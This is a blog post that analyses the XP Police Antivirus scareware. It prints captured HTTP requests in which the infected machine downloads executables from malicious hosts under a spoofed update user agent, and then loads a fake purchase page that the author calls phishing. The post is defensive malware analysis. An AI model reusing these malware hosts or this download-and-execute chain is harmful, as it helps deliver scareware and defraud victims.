Wednesday, March 11, 2009

Aggressive strategy of XP Police Antivirus infection. Second part

From the time that the infection of XP Police Antivirus, you will begin to display on screen a series of false alerts on emerging infections, among others.

But in a fully transparent manner, will produce a series of actions to complete the work of scareware. Through listening to the traffic, we see the unloading of the following components:
GET /setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

Download setup.dat isn't a data file but a compressed file that saves a copy of the other files that are uncompressed in C:\Program Files\XPPoliceAntivirus.
GET /sysupdate.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

Download sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0) which is used to compress the malware runtime try to avoid detection by antivirus programs.
GET /svchost32.exe HTTP/1.1
User-Agent: MS_Update32

Host: setupdatdownload.com


HTTP/1.1 200 OK

Server: nginx

Date: Sat, 28 Feb 2009 12:47:46 GMT

Content-Type: application/octet-stream

Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT

Accept-Ranges: bytes

Content-Length: 2746314

Connection: Keep-Alive

Age: 0


MZ......................@...............................................!..L.!This program cannot be run in DOS
mode.


GET /land.txt HTTP/1.1

User-Agent: wget 3.0

Host: xp-police-09.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Sat, 28 Feb 2009 12:51:15 GMT

Content-Type: text/plain

Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT

ETag: "3a58001-1-bd70a300"

Accept-Ranges: bytes

Content-Length: 1

Connection: Keep-Alive

Age: 0


2


GET /js/window.js HTTP/1.1

Accept: */*

Referer: http://www.xp-police-09.com/installed.php?id=108

Accept-Language: es

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: www.xp-police-09.com

Connection: Keep-Alive

Cookie: id=108

JavaScript windows.js displayed on screen pop-up window with the caption Thank you for Installation!


GET /buy.php?id=108 HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

This is the page to purchase the scareware from where sensitive information and financial requests of the victim. It's a scam/phishing.

The maneuvers used by malicious code are becoming more aggressive and effective in their actions because, as could be seen, the installer is downloaded in the first instance, is only part of the puzzle from which the other gets scareware pieces.

Related Information
Aggressive strategy of XP Police Antivirus infection
Campaign spreading XP Antivirus Police through Visual Social Engineering


# Jorge Mieres

No comments: